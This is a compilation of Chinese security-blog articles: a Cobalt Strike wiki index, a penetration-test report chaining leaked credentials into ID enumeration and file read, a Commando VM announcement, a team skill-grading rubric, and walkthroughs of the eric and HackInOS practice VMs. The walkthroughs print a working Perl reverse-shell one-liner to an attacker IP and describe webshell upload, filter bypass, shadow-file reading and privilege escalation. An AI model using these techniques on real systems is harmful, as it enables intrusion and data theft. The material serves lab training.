https://github.com/aleenzz/Cobalt_Strike_wiki

目录

第一章 CS基础

第一节[环境搭建与基本功能]
第二节[Listeners,Beacon与payload的初使用]
第三节[SMB Beacon]
第四节[DNS Beacon]
第五节[钓鱼 HTML Application]
第六节[钓鱼 MSF联动钓鱼]
第七节[钓鱼 鱼叉邮件]
第八节[钓鱼 Office]
第九节[Beacon 键盘记录,屏幕截图]
第十节[Beacon socks代理,vpn,与端口]
第十一节[Beacon 浏览器劫持与端口扫描]
第十二节[Beacon 提权与powershell]
第十三节[Beacon hash导出]
第十四节[Beacon SSH]
第十五节[横向渗透]
第十六节[MSF与CS会话互转]
第十七节[权限维持]

第二章 免杀

2-第一节[利用框架免杀]
2-第二节[C shellcode 加载]
2-第三节[利用脚本加载shellcode]
2-第四节[c# shellcode简单加密免杀]
2-第五节[python shellcode 加载]
2.第六节[powershell混淆]

第三章 脚本

3-第一节[Malleable C2 配置简介与使用]
3-第二节[Malleable C2 语法解析与文档]
3-第三节[Malleable C2 简单脚本编写]
3-第四节[AggressorScripts使用]
3-第五节[AggressorScripts编写文档简介]
3-第六节[AggressorScripts编写Sleep语法简介]
3-第七节[AggressorScripts编写CS菜单]
3-第八节[AggressorScripts编写简单的脚本]

上个月做了一次项目,是某系统的测试,简单做一次测试总结

首先拿到项目给的测试范围,几个域名打开发现都是需要登入的系统,首页只有一个登入框。

1.png

第一眼。没啥思路,有验证码burp爆破路子是行不通了。测试也不让用扫描器,于是上搜索引擎搜一下这个系统。发现某一个页面有该系统的介绍和附件下载,大致介绍就是大家要熟练使用这个系统。

2.png

下面跟着一个附件的下载链接,下载回来打开看看,发现是系统使用的说明书。

3.png

而且运气很好,这个说明书的编写者,在编写说明书的时候截图了部分系统的使用界面,而界面中刚好就包含了一部分专家的账号。

4.png

同时说明书里也写出了所有账号所使用的初始密码。

5.png

观察了一下泄露的账号,fuzz一下账号的命名规则,结合初始密码。因为有验证码的关系,逐个去手动登入了一下。试了大概四五个就遇见了一个没改初始密码的账号。

6.png

成功登入

进入系统后 发现该系统是专家的评审系统,每个账号只可以看到10人信息并给与评审

7.png

直接F12一下查看页面元素。发现每一个姓名都有一个ID号。

8.png

猜测应该是通过ID参数来显示可能存在ID遍历,于是用burp尝试抓包

9.png

可以看到ID遍历出了所有包含了姓名 编号 手机号 身份证号 照片路径 单位 等详细信息的用户信息

10.png

然后照片处发现了一个神奇的URL

11.png

照片的路径为URL=/图片路径/
尝试把URL后面的路径改为/etc/passwd

12.png

成功下载到passwd文件,一个任意文件读取的漏洞到手了。

继续翻看系统发现一个没验证码的登入页面,随便试了一下,发现并没有提示登入成功还是失败,也没有返回任何信息

13.png

抓包分析一下,发现账号密码正确则返回ture,反之则返回flase

14.png

于是用刚刚ID遍历获取的身份证信息做字典 用户名为身份证 密码为身份证后八位(为啥后八位,之前泄露的说明书里有说明)

15.png

对可以成功登入的账号和密码进行整理,去尝试进行其他系统的撞库。刚好另一处登入系统的账号就是身份证。

16.png

尝试撞库登入系统

17.png

成功登入另一处系统,

总结一下:
这次漏洞的主要起因就是客户习惯性的用公告的形式,同时用户去下载一个看似不起眼的使用说明书,而说明书的编写者没有对系统截图中的敏感截图部位进行打码处理,导致了部分用户登入账号信息泄露出去,而正是这几处微小的不起眼的细节给攻击者一个可乘之机。从而导致了后面一连锁的漏洞。如果没有这个附件给与登入系统的突破口,那么后续也无法登入系统,从而无法发现ID遍历和任意文件下载,进而也无法在无验证码的登入页面处制作字典撞库其他系统。

以下网友讨论:

45190FB2-4D71-4F3B-B69C-D0C929917C84.png

2019年3月28日,火眼发布了一个包含超过140个开源Windows渗透工具包,红队渗透测试员和蓝队防御人员均拥有了顶级侦察与漏洞利用程序集。该工具集名为“CommandoVM”。

安全工作者在对系统环境进行渗透测试时常常会自己配置虚拟机,如果是Linux的话还好,还有Kali Linux可以用。但是碰上Windows环境就惨了,往往配置虚拟机环境就要好几个小时。一边要维护自定义的虚拟机环境,一边还要时常升级集成的工具套件,花费的时间成本颇高。最近火眼推出了一款面向红队的Commando VM渗透测试套件,有需要的小伙伴可以看一看,免费又好用。

1.jpeg

火眼旗下麦迪安网络安全公司顾问以及Commando VM套件的联合创建者 Jake Barteaux 表示:

在进行内部渗透测试时,我身边的大部分渗透测试工程师都会先自行配置一个Windows测试环境。能不能把这个环境配置好,配得有多快,已然成为了衡量渗透测试工程师手艺高低的标准了。其中很多人都会再自己配置的环境中集成Commando中也有的工具,不过在对Windows进行渗透测试时大家并没有形成一个标准的工具集。

这一次火眼推出的标准化工具套件解决了两个最关键的问题。其一是整合了最优秀的渗透测试工具,无需再花很多时间去寻觅。其二则是2013年发布的Kali Linux继承了超过600款安全、取证和探索工具,Commando选取了其中适用于Windows平台的精华工具,其中很多还是Windows平台原生支持的。

而渗透测试人员面临的第二个问题就是工具集的维护。Commando VM将所有工具打包到一个发行版中可以加快维护速度,修补和更新都更加简单。
关于Commando VM

火眼本次推出的Commando VM套件面向Windows平台构建,属于此前发布的FLARE VM套件的全新迭代版本,后者专攻逆向工程和恶意软件分析,Commando VM功能更加全面,是Windows环境中内部渗透测试的首选平台。

使用基于Windows平台构建的虚拟机环境有以下几点明显优势:

1、原生支持Windows和Active Directory;

2、可作为C2框架的临时工作区;

3、更便捷的共享和交互式操作支持;

4、支持PowerView和BloodHound等工具;

5、对测试目标不产生任何影响。

2.jpeg
工具列表(详见文末GitHub地址)

Commando VM使用Boxstarter、Chocolatey和MyGet软件包来安装所有软件,并提供多种用于渗透测试的工具和实用程序,共计140多款,涵盖以下领域:

Nmap
Wireshark
Covenant
Python
Go
Remote
Server Administration Tools
Sysinternals
Mimikatz
Burp-Suite
x64dbg
Hashcat

红蓝对抗中的双方都可以从Commando VM获益,对于蓝队而言该套件提供了高性能的网络审计和检测能力。

3.jpeg

安装

建议在虚拟机中部署Commando VM,使用虚拟机软件的快照功能减少重新配置环境所需的时间,虚拟机环境要满足以下最低要求:

60GB磁盘空间

2GB内存

在完成虚拟机的基本配置后安装Windows镜像,支持:

Windows 7 Service Pack 1

Windows 10

建议使用Windows 10镜像以支持更多功能。

系统安装完成后建议添加配套的虚拟机工具(例如VMware Tools)以支持复制/粘贴、屏幕显示调整等其他设置。虚拟机环境配置成功后,以下所有的步骤均在该环境中操作。

1、运行Windows Update确保系统已更新至最新版。建议更新完成后重启系统再次检查。

2、确保系统为最新版本后建立快照,万一需要重新配置的话可省去安装系统的时间。

3、下载GitHub上的Commando VM文件并解压缩。

4、找到解压缩后的文件夹目录,使用管理员权限打开PowerShell会话(安装Commando VM需要修改系统设置)。

5、键入以下命令将PowerShell的执行策略更改为不受限制,并在PowerShell提示时回答“ Y ”:Set-ExecutionPolicy unrestricted

6、执行install.ps1安装脚本。系统将提示输入当前用户的密码。Commando VM需要当前用户的密码才能在重启后自动登录。可以通过命令行“-password ”来指定当前用户的密码。

4.jpeg

7、剩下的安装过程需要联网并自动执行,根据网络速度可能需要2至3小时完成。期间虚拟机系统会重启多次。安装完成后,PowerShell保持打开状态,键入任意键可退出,完成后的桌面如下:

5.jpeg

8、看到这个桌面后再次重启系统保证所有配置生效。重启后再次建立快照以便不时之需。

传送门

Commando VM 页面:https://www.fireeye.com/blog/threat-research/2019/03/commando-vm-windows-offensive-distribution.html

Commando VM 项目地址:https://github.com/fireeye/commando-vm

首先声明,这绝不是招聘广告,我们目前暂时也没有招人计划。我们在设计这套技术定级体系的时候倒的确查阅了很多招聘信息,也发现有些渗透测试岗位的招聘信息算是千篇一律的内容,不管是初级安全工程师还是高级渗透工程师好像都是那么几条,而我们这篇文章的内容有些的确比较适合用来设计不同级别的渗透测试岗位招聘信息的。

背景

在一个渗透测试团队建立之初,人员可能比较少,甚至说都有可能是一个人就是一个团队,这个时候只需要忙着做项目、做应急、写方案就行了,绩效什么的可能都没人单独去考核,工资也是领导根据你发际线高度大体就定了。

但随着人员越来越多,每个人擅长的方向和领域也有了不同,这个时候给每个人定一个薪资就有了一定难度。也有人说,技术岗位只要技术好那么薪资肯定就高,还说技术岗位的技术能力很好评定,但薪资不止是技术维度,还涉及积极性、饱满度、贡献度等,而且说技术能力好评定的估计也是没有细细考虑过的,比如你可以说在一个渗透测试项目里A挖的洞比较多比较突出,但你就这样来评定A的能力比其他人强就有点太牵强了。

基于这些考虑,我们团队内部制定了一套针对渗透测试团队的技术评级体系,供大家参考。

因为我们都是搞技术出身,没有任何薪资和人力相关经验,制定的评级体系也只是从技术角度去考虑,所以肯定有些不合理的地方,大佬们不要见笑~~

评级原则

我们制定评级体系的原则有如下几条:

1.透明原则

这是整个技术评级体系的设计核心。作为一个小型初创渗透测试团队(十来个人规模,而且水平都是比较水的那种,因此这一机制可能不适用于较大规模的团队或实验室),我们需要一个透明、自动化的机制来保证在技术评级这一敏感问题(直接挂钩薪资)上尽可能的公平。

2.引导技术为王的风气

毕竟还是初创团队,大家也都是在初级成长阶段,所以一个好的技术氛围也能引导大家能研究的更深能走的更远,尽量避免有些人在工作若干年后安于做项目,技术较为一般且成长较慢,但调薪时又会以资历老压住一些有能力的新人。而一个好的定级评定标准能较好的引导大家走向更高的技术水平。

3.尽量保证所有项都能被量化

我们在设计每条考核指标的时候都讨论过该条款能否被量化,保证该内容不是非常模糊或者宽泛的内容,尽量能让大家在申请该级别的时候能根据自己的工作去匹配该考核项。

4.多套考核相结合

我们不仅只有这套技术评级来最终给团队成员定级,我们还会结合个人的绩效考核(主要涉及项目量、项目质量、报告质量、工作饱满度、工作积极性等)全年成绩,来确定该成员能否晋级。绩效考核是每月绩效工资的考核内容,也会对成员的每月收入有一定影响,不过不是我们今天讨论的重点。

适用范围

1.小型初创团队

团队处在快速成长期,成员能力和水平变动比较大,新员工赶超老员工的情况也比较常见,这时候就需要有一套比较好的技术评级标准来衡量考核相应技术提升。

2.上下均能认同该评级体系

每个级别都有不同的10个评定细则,这10个细则来衡量一个人的整体水平肯定比较片面,所以我们尽量挑选了一些比较有代表性、通用性的技术点,不管是领导还是员工也都认可:只要个人能力能达到该水平就代表能进行相应评级。

3.可以用来招聘

对每个级别的10条要求都是经过了认真赛选的,大家也算都能认可的,所以这些信息也可以用来设计招聘信息或者用来对不同技术层面的面试者进行面试。

评级方法

我们目前是要求成员在申请相应技术级的时候,每个级别下的10个评定细则中需要能满足7个及以上。

另外,也允许约级适用条款,比如某成员在T2准备申请T3级时,可能有些T3的要求项不具备,但他具备T4的一些要求项,那么他也可以用T4的某一个或多个要求项来弥补T3申请时的不足。

评级细则

我们将渗透测试技术能力区分了7个级别,因为我们团队名是Tide,所以就用T来进行标识各级别了。另外,我们的“能力描述”有些是借鉴了阿里P级的级别描述~~

再次声明,因为我们属于初创团队,所以这种级别评定的水平和层次都比较低,大家觉得用得上的可以看看,薪资是我随手编的,路过的大佬就当看个笑话就行了(>_<)

T1(助理工程师)

级别设计初衷:应届实习生、web安全初学者

年限要求:0-1年

薪资水平:6k-8k

能力描述:

1)有相关专业教育背景或从业经验;

2)对公司职位的标准要求、政策、流程等从业所必需了解的知识处于学习成长阶段;

3)能协助完成渗透测试项目。

能力要求:

1.熟悉Web安全、移动端安全等网络安全相关知识,了解网络安全法律法规与行业标准;

2.熟悉国内外主流安全产品和工具,如:Nessus、Nmap、AWVS、Burp、Appscan等;

3.能较好的完成渗透测试方案制定、文档编写等;

4.能根据测试用例进行逐项测试;

5.有较强的学习能力和钻研精神;

6.熟悉各类操作系统及数据库常见的安全漏洞和隐患,熟悉owasp top10;

7.熟悉各类网络安全设备、系统,如防火墙、VPN、IPS、WAF、防火墙、网页防篡改系统等;

8.具备一定编程基础,了解或熟悉C/C++/Perl/Python/PHP/Go/Java等开发语言;

9.具备良好沟通能力和语言表达能力;

10.拥有自己的博客、Github、安全圈等;

T2(初级工程师)

级别设计初衷:能独立完成项目,具有一定漏洞挖掘能力、应急响应能力

年限要求:0-1年

薪资水平:8k-10k

能力描述:

1)有相关专业教育背景或从业经验;

2)在专业领域中,对于本岗位的任务和产出很了解,能独立完成常规渗透测试项目,能配合完成复杂任务;

3)具有一定漏洞挖掘能力、应急响应能力。

能力要求:

1.熟悉主流的Web安全技术,掌握Web安全常规漏洞原理及防范措施,包括SQL注入、XSS、XXE、RCE等安全风险;

2.能对测试用例进行逐项深入测试,对测试备忘录中的所有漏洞都了解并能进行测试;

3.至少熟悉一门编程语言C/C++/Perl/Python/PHP/Go/Java等,能够进行脚本、漏洞验证的poc编写或改写;

4.熟悉Linux和UNIX主流操作系统和主流数据库(SQL、MySql、ORACLE等)并具备渗透测试能力;

5.能熟练搭建靶机并进行漏洞复现,并有文章总结输出3篇以上;

6.在各大安全漏洞平台、企业SRC平台提交漏洞;

7.处理过木马、病毒、入侵、网络攻击等突发安全事件经验;

8.分析高危漏洞原理和利用技巧,撰写相关技术总结文档;

9.具备WEB/APP(Android)渗透测试、数据隐私检测、安全评估、安全加固、应急响应、安全护航等实施和交付能力;

10.对CTF比赛中的web题目有一定的研究经验,了解加解密优先。

T3(中级工程师)

级别设计初衷:有擅长的安全领域

年限要求:1年及以上

薪资水平:10k-14k

能力描述:

1)在专业领域中,对公司职位的标准要求、政策、流程等从业所必需了解的知识基本了解,对于本岗位的任务和产出很了解,能独立完成复杂任务,能够发现并解决问题;

2)在中小型项目当中可以担任项目经理职责;

3)对逆向有一定了解,有自己擅长的安全领域。

能力要求:

1.熟练使用Perl/Python/PHP/Go/Java中的一种,能快速独立完成poc开发,如爬虫、破解类脚本;

2.对waf等各种防护措施的绕过有一定了解;

3.在知名安全媒体上发表5篇以上较受关注的文章;

4.具有一定的源码审计(php/asp/jsp/python)能力,发现过通用漏洞或发表过文章;

5.熟悉汇编、smali代码,具有一定逆向能力,能对病毒、木马、APP等进行分析;

6.具备一定内网渗透、域渗透能力,有成功案例;

7.熟悉windows、linux平台渗透测试、后门分析、加固;熟悉各类攻击技术,能针对各种攻击类型进行入侵分析和取证;

8.具有CTF比赛经验、网络攻防竞赛经验,熟悉CTF技巧并能拿到一定分值;

9.独立挖掘过通用漏洞,具有CNVD原创证书或cve证书;

10.在工控、物联网、云安全、人工智能、大数据安全等领域有一定研究并有成果。

T4(高级工程师)

级别设计初衷:侧重于逆向技术,引导内外部贡献

年限要求:2年及以上

薪资水平:14k-20k

能力描述:

1)在专业领域,具备一定的前瞻性的了解,对公司关于此方面的技术或管理产生影响;

2)对于复杂问题的解决有自己的见解,对于问题的识别、优先级分配见解尤其有影响力,善于寻求资源解决问题;

3)在内网渗透、安全开发、逆向分析等方面有所研究

能力要求:

1.精通一种以上脚本语言,能独立完成中小型安全平台的开发或对接业务安全需求进行定制化开发;

2.对waf绕过等有较深入的研究,能自己编写waf规则,能绕过多种防护设备;

3.拥有NSATP、CCNP、RHCE、CISSP、CISA等证书之一;

4.具备较强内网渗透、域渗透能力,具有3个以上中型内网成功案例;

5.熟悉J2EE或php开发架构,熟悉主流web框架;具有JAVA/php开发经验或代码安全审计能力(白盒测试)并有成果输出;

6.每年在专栏或公众号发表文章5篇以上,论文/期刊1篇;

7.熟悉x86/x64系列汇编语言、c/c++语言,熟练使用IDA、Windbg、Ollydbg、Immunity Debugger等分析工具,熟悉静态分析、动态调试、代码跟踪方法,具备较强的逆向分析能力;

8.参加国内较高水平CTF比赛,取的较多分值协助团队取得较好名次,熟悉通用加密算法、逆向或pwn优先;

9.有独立提交3个以上高风险漏洞,如漏洞盒子、补天或SRC等,SRC累积赏金一万以上;

10.具有cnvd原创证书或cve证书3个以上。

T5(安全研究员)

级别设计初衷:专精某一领域,研究较为深入

年限要求:3年及以上

薪资水平:20k-35k

能力描述:

1)在某一专业领域中,对于公司及业界的相关资源及水平比较了解;

2)开始参与部门相关策略的制定;对部门管理层的在某个领域的判断力产生影响;

3)是专业领域的知名人士。

能力要求:

1.熟悉逆向知识,具备多平台逆向经验(iOS/Android/Windows),模拟器检测对抗研究等,能对病毒、木马进行深入分析;

2.熟悉浏览器、office、adobe以及flash等软件内部工作原理以及相应软件漏洞分析与利用技术;

3.对CTF比赛中的pwn、reverse题目有较深的研究经验;熟悉对称及非对称密码体系常见加解密算法;熟悉流量分析、数据隐写、取证等技术;

4.在阿里、蚂蚁金服、腾讯、360、百度等知名SRC排名前三;

5.每年在专栏或公众号发表文章10篇以上,论文/期刊累计3篇及以上;

6.能掌握一门或几门以下技术:PHP/Python/Shell/JavaScript/Ajax进行系统开发,至少精通一种数据库应用,如mysql、redis、mongodb等;

7.对业界前沿攻击和防御手法进行研究跟踪,能单独处置常见信息安全事件及热点事件跟踪,针对最新的安全漏洞及安全事件进行响应处理;

8.对内网渗透、APT攻防、黑灰产分析等有较深入研究并有成果输出,拥有反欺诈/反爬虫/业务风控/威胁情报分析能力;

9.对操作系统(win/mac/win)、移动端、工控、物联网等方面之一的安全技术有较为深入的研究并有成果输出;

10.能精通一门语言的主流框架,如php的tp5、yii或python的flask、django,掌握框架的安全漏洞及利用。

T6(安全专家)

级别设计初衷:技术专家,引导团队内技术走向

年限要求:5年及以上

薪资水平:35k-60k

能力描述:

1)是公司某一领域中的资深专家;

2)对公司某一专业方向的规划和未来走向产生影响;

3)对业务决策产生影响;

4)使命感驱动。

能力要求:

1.挖掘浏览器、Office、Adobe Reader、flash等客户端软件以及网络协议常见漏洞;熟悉操作系统的相关安全机制,掌握绕过漏洞缓解措施的基本方法;

2.在某领域出版过电子书籍或实体书,具有一定影响力;

3.熟悉常用算法和数据结构,精通C/C++/Java/Go/Python/Shell/Perl语言中的一种或多种,能够进行漏洞扫描器、网络爬虫架构设计与产品开发;能独立完成自动化安全扫描或者防御框架;

4.发表过有深度的技术Paper或独立挖掘过知名开源应用/大型厂商高危漏洞经历;

5.熟悉病毒木马,内核Rootkit的原理和行为,并对其做深入技术分析和逆向;

6.参加过FIT、Geekpwn、Xcon等大型安全会议的演讲;

7.精通防火墙、入侵防御、病毒防护、漏洞扫描、审计系统、身份认证等信息安全产品基础原理、安全部署,根据客户需求提供解决方案;

8.进行事件调查/追溯攻击者经历,IoC大规模处理经验,具备APT攻击和防御能力;具备从流量、日志、事件等数据中发现威胁的能力和威胁情报分析能力;

9.精通各类常见漏洞的原理、测试方法以及解决措施,具有分析研究安全漏洞的能力;且有丰富的攻击渗透实战经验、Fuzzing测试能力;

10.有大型CTF比赛(DEFCON、XCTF等)或国内顶级赛事获奖经历。

T7(首席安全官)

级别设计初衷:业内知名专家,基本无所不能

年限要求:8年及以上

薪资水平:60k-1000000k

能力描述:

1)业内知名,对国内/国际相关领域都较为了解;

2)对公司的发展做出重要贡献或业内有相当的成功记录;

3)所进行的研究或工作对公司有相当程度的影响;

4)使命感驱动;坚守信念;对组织和事业的忠诚。

能力要求:

1.参与国家地方或行业相关部门的信息安全标准制定;

2.主导过大中型网络、互联网应用等安全建设;

3.前沿安全攻防技术研究与利用,熟悉业界安全攻防动态,掌握国内外最新安全攻防技术;

4.对大数据、人工智能、物联网、工控安全、区块链等新兴技术具有较深研究,能够熟悉该行业最新攻击方法、渗透技术以及防御技术;

5.具备极为丰富的应急响应,事件调查经验,能利用技术进行事件调查/追溯攻击;

6.对安全体系的构建,安全架构的规划与设计、以及开发生命周期安全规范的落地具有丰富经验;

7.熟悉通用信息安全风险管理流程与框架,对国际国内信息安全标准如ISO27001,等级保护标准等有着较为深入的理解,并具有丰富的标准融合、体系落地及推广经验;

8.对代码虚拟化、反调试、反Hook等具备一定造诣,具备较强的逆向分析、攻防对抗、脱壳、反混淆相关能力;

9.对各类操作系统、应用系统的漏洞有较深理解,具有安全加固、渗透测试、应急响应等安全服务的实施经验;

10.拥有自己的研发专利、知识产权;出版过相关领域评价度较高的书籍。

两个问题

Q1:公开薪酬标准不怕其他公司来挖人吗

说到底对于大部分初创团队来说,市场上更有钱、更土豪的公司都大有人在。对于大部分小公司来说没有办法光靠钱引进人才。所以我们认为通过好的团队氛围、工作环境,搭配合适的、有竞争力的薪酬水平,是比较好的争取人才的方式。再说了我也没公开薪酬,上面薪资纯粹靠编。。。

Q2:靠10个要求项来判定一个人是否不合适

肯定不合适的。前面也说了,这10条只是一个水平标准线,是一个引导性的方向,是代表能达到相应技术水平层次的能力,包括而不限于这些项,我们也相应当你达到相应水平的时候也绝不会只会这几条。另外我们还有绩效考核,会对技术之外的更多维度进行评定。

电子版下载

Tide安全团队技术评级电子版:链接:https://pan.baidu.com/s/1pCCvtewKJGDElZaSO5fxTQ 提取码:eo4g

靶机下载/安装

eric靶机:https://pan.baidu.com/s/1K8oNsUstcHjc5lg7x0Yixw

提取码:2nv9

HackInOS靶机:https://pan.baidu.com/s/17jXHtM-bePjChNolSx9hpw

提取码: ywzb

1.png

2.png

实战

eric靶机

靶机IP:172.16.24.91

3.png

下面老规矩我们用nmap开路

4.png

可以看到它开放了80端口

5.png

可以看到上面的提示,说博客还没开发好。。。

那我们使用目录猜解工具跑一下吧。。。

6.png

看到了admin.php,我们访问一下看看

7.png

可以看到一个非常简单的登陆界面。。。 小伙伴们是不是准备要爆破?哈哈哈 其实不建议这么做,因为密码你肯定不可能爆破出来。。。

那么下一步我们怎么办呢?小弟这里就重新开启nmap,加上一些命令再跑一遍。。

如图:

8.png

可以看到有突破口了,/.git 这个相信大家都比较熟悉,平时真实工作中可能也能碰到,我们就不做废话了,直接使用lijiejie大神写的工具来完成吧。下载地址:

https://github.com/lijiejie/GitHack

9.png

可以看到成功拿到了 admin.php 文件,我们查看一下该源码

10.png

我们拿到了账号密码: admin – st@mpch0rdt.ightiRu$glo0mappL3

(密码这样的怎么破解。。。。捂脸表情)

直接登陆吧

11.png

然后就上传shell,在/upload 目录下拿访问shell

12.png

下一步就是反弹shell提权了

因为本靶机没有安装python,但是它安装了perl

13.png

所以本次使用perl命令为:

perl -e 'use Socket;$i="172.16.24.81";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

14.png

然后我们拿到一个正常美观的shell,并且拿到了第一个flag,

下面我们就开始提权吧,通过上图可以看到/home/eric/目录下有backup.zip、backup.sh 2个敏感文件,且backup.sh 程序为root权限,我们还有权限修改。。我们先看一下该程序是做什么工作的,跟谈恋爱一样的 至少要了解人家是做什么工作的漂亮不漂亮 对吧,后期在扒人家。。。 呸 是后期再慢慢相互接触了解对吧,如图:

15.png

可以看到这里的代码很简单,就是压缩打包我们的网站目录。。。这样套路我们就不用怀疑了,直接修改该sh文件然后静静等待让它上来自己动就行了。。

如图:

16.png

注:小弟我这里当时试了很多命令,均都是连上后没办法操作或者连上就断了,最后使用的命令是 msf 生产sh文件完成的

具体操作如下截图:

17.png

最后我们就是静静地等待。。。。

来啊 快活啊,反正有…

18.png

19.png

成功拿到root-flag,该靶机还是比较简单的

本靶机完!

HackInOS靶机

靶机IP:172.16.24.71

这个靶机挺不错的,小伙伴们可以先不看文章教程,自己先搞一下试试。

老规矩nmap开路,

20.png

可以看到8000端口,使用了http服务,采用Wordpress搭建的。

下面nmap 也给我列出来/robots.txt 下的内容,小弟为了节省文章篇幅,就不截目录猜解的结果了,我们把目光放在 /upload.php 下

21.png

如上图,随意上传一个php,无法成功,给了我们一个笑脸….

然后习惯性右击查看源码,如图:

22.png

什么都没有。。。然后小弟就打开burp,准备看能不能饶过,结果发现了这个。。。

23.png

wtf?? 原来是写在了最后。。。 一下子粗心没下拉到最后…..

24.png

然后我们跟进这个GitHub项目看看,发现了该php上传点的源码

25.png

我们先来看一下该程序的判断规则是判断文件头,这里就比较简单了,在PHP马头部,加上 “GIF98” 即可绕过,成功上传。如图:

26.png

但是我们访问/upload/shell名字 却没有?为什么呢?

其实大家不知道有没有注意到上面源码中的第18、20行代码呢?可以看到程序对我们上传的shell名字然后加上1-100的数字,在进行md5 加密储存。。。。

那怎么办呢?我们就写python脚本吧,如图:

27.png

运行该程序后,我们就得到了一个shell名字+1-100数字合并并md5加密的字典列表,如图:

28.png

下一步我们继续上传一个shell(注:这里有2点需要说明,1. /upload目录下的文件上传成功后会很快被清除;2.这里我自己平时用的大马shell上传成功后,输入密码无法登陆无法正常使用)

所以小弟这次使用的是 weevely 生成的php马

29.png

30.png

下一步我们使用目录猜解工具,跑一下

31.png

后面使用weevely链接这个shell

32.png

成功后,我快速切换到网站根目录下上传了一个图形化的shell大马

33.png

下一步就是正常反弹shell提权了,

34.png

我们上传提权脚本,发现了这个

35.png

下面我们使用命令 tail -c1G /etc/shadow 拿到了root密码

36.png

下一步我们破解一下这个密文

37.png

得到root密码:john ,我们直接切换root,如图:

38.png

小伙伴们肯定以为到这里就结束了?哈哈哈哈 还没呢。。。革命还未完成,同志们还得继续努力啊,那我们继续找找翻翻看有没有什么突破口吧

39.png

继续继续

40.png

172.18.0.x 网段???

OK 我们先使用msf拿到一个反弹shell吧,操作如图:

41.png

下面复制这段代码,在root-shell 下运行,如图:

42.png

43.png

下一步添加上路由,探测一下该网段的情况吧

44.png

45.png

46.png

可以看到172.18.0.2 端口开放了 3306 mysql服务,我们找一下网站的账号密码看能不能登陆,如图:

47.png

48.png

成功登陆,我们继续看看

49.png

成功拿到md5密文,下一步就是破解该密文了,

50.png

下面我们登陆ssh 账号密码:hummingbirdscyber – 123456

51.png

成功登陆,下面我们继续探索。。。。

52.png

发现了docker?记得前面用提权脚本探测时,也发现了docker的身影,如图:

53.png

我们看一下docker的运行情况

54.png

下面我们直接以root身份,运行该docker虚拟机吧

55.png

成功登陆,最后就是拿flag了

56.png